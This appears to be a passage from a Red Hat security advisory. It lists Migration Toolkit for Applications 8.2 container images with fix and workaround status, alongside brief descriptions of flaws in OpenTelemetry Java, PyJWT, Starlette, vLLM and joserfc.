|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in OpenTelemetry Java, specifically within the baggage propagation implementation of opentelemetry-api and opentelemetry-extension-trace-propagators. A remote attacker can exploit this vulnerability by sending oversized baggage, which leads to unbounded memory allocation and high CPU consumption. This can result in a Denial of Service (DoS) for the affected service. Furthermore, because baggage is automatically re-injected into outgoing requests, the impact can spread to other downstream services.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in PyJWT, a Python library for JSON Web Token (JWT) implementation. When decoding JWTs, the library fails to validate the use of JSON Web Keys (JWK) in the HMAC algorithm while also supporting asymmetric algorithms. This allows a remote attacker to use the issuer's public key as the secret key for the HMAC algorithm, leading to the ability to forge JWTs. This vulnerability can result in authentication bypass or unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
A flaw was found in Starlette, a lightweight ASGI (Asynchronous Server Gateway Interface) framework. A remote attacker could exploit this vulnerability by sending a specially crafted HTTP `Host` request header. This malformed header could cause the `request.url` to be incorrectly reconstructed, leading to a discrepancy with the actual requested path. Consequently, security restrictions enforced by middleware and endpoints that rely on `request.url` for validation could be bypassed, potentially allowing unauthorized access or actions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in vLLM, an inference and serving engine for large language models (LLMs). This vulnerability, residing in ASGI web servers and Starlette's trust in them, allows an attacker to bypass the OpenAI API Authentication Middleware. This bypass enables unauthorized access to the API without requiring the configured VLLM_API_KEY or --api-key, leading to critical unauthorized operations.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64 | — |
Workaround
|
A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
